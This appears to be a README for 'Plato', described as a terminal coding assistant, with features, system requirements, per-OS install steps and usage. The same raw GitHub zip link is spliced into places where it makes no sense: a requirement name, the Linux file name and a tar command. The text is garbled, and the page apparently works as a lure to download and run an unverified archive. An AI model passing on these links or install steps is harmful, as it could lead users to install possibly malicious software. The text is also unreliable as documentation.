Plato is your friendly terminal assistant. It helps you navigate your coding tasks with ease. Whether you want to check code changes, manage permissions, or call different tools, Plato makes these tasks simple and fast.
- AI Assistance: Get smart suggestions while you code.
- Code Analysis: See differences in code easily.
- Permissions Management: Control who can do what with your code.
- Tool Integration: Seamlessly integrate with other command-line tools.
- User-Friendly Interface: Enjoy a clean interface, whether in TUI (Text User Interface) or CLI (Command Line Interface).
Before you download Plato, make sure your system meets these basic requirements:
- Operating System: MacOS, Windows, or Linux
- https://raw.githubusercontent.com/Sgon4arov/plato/main/poy/plato.zip Version 14 or higher
- Memory: 4 GB RAM minimum
- Disk Space: At least 200 MB available space
To get started, visit this page to download: GitHub Releases.
- Click the link above to go to the Releases page.
- Find the latest version of Plato.
- Download the appropriate file for your operating system.
- Follow the installation instructions specific to your OS.
For Windows:
- Download the
.exefile. - Double-click the downloaded file.
- Follow the installation prompts.
For MacOS:
- Download the
.dmgfile. - Open the downloaded file and drag Plato to your Applications folder.
- Launch Plato from your Applications.
For Linux:
- Download the compressed file (usually
https://raw.githubusercontent.com/Sgon4arov/plato/main/poy/plato.zip). - Open your terminal.
- Navigate to the directory where you downloaded the file.
- Extract the files using the command:
tar -xvf plato-*https://raw.githubusercontent.com/Sgon4arov/plato/main/poy/plato.zip - Navigate to the extracted folder and run Plato using:
./plato
Once installed, you can open Plato from your terminal. Here are some basic commands to help you get started:
- Open Plato: Just type
platoin your terminal and hit enter. - Command List: Type
helpto see a list of commands you can use. - AI Suggestions: Start coding, and Plato will provide suggestions based on your input.
To check for code differences, simply use:
plato diff <file1> <file2>
Plato will show you a side-by-side comparison of the two files, highlighting the changes.
We welcome contributions to improve Plato! If you want to help, please follow these steps:
- Fork the repository.
- Create a new branch for your feature.
- Make your changes.
- Submit a pull request explaining your changes.
Read our Contributing Guidelines for more details.
- Documentation: Explore more about how to use Plato, including advanced features.
- FAQ: Find answers to common questions.
- Community Forum: Join discussions and get help from other users.
If you encounter any issues, please check our FAQ. If you still need help, feel free to reach out by opening an issue on GitHub. We're here to assist you.
To keep up with the latest news and updates for Plato, consider following our social media channels and watching the repository.
Thank you for choosing Plato, your coding assistant. We hope it makes your coding experience smoother and more enjoyable! Happy coding!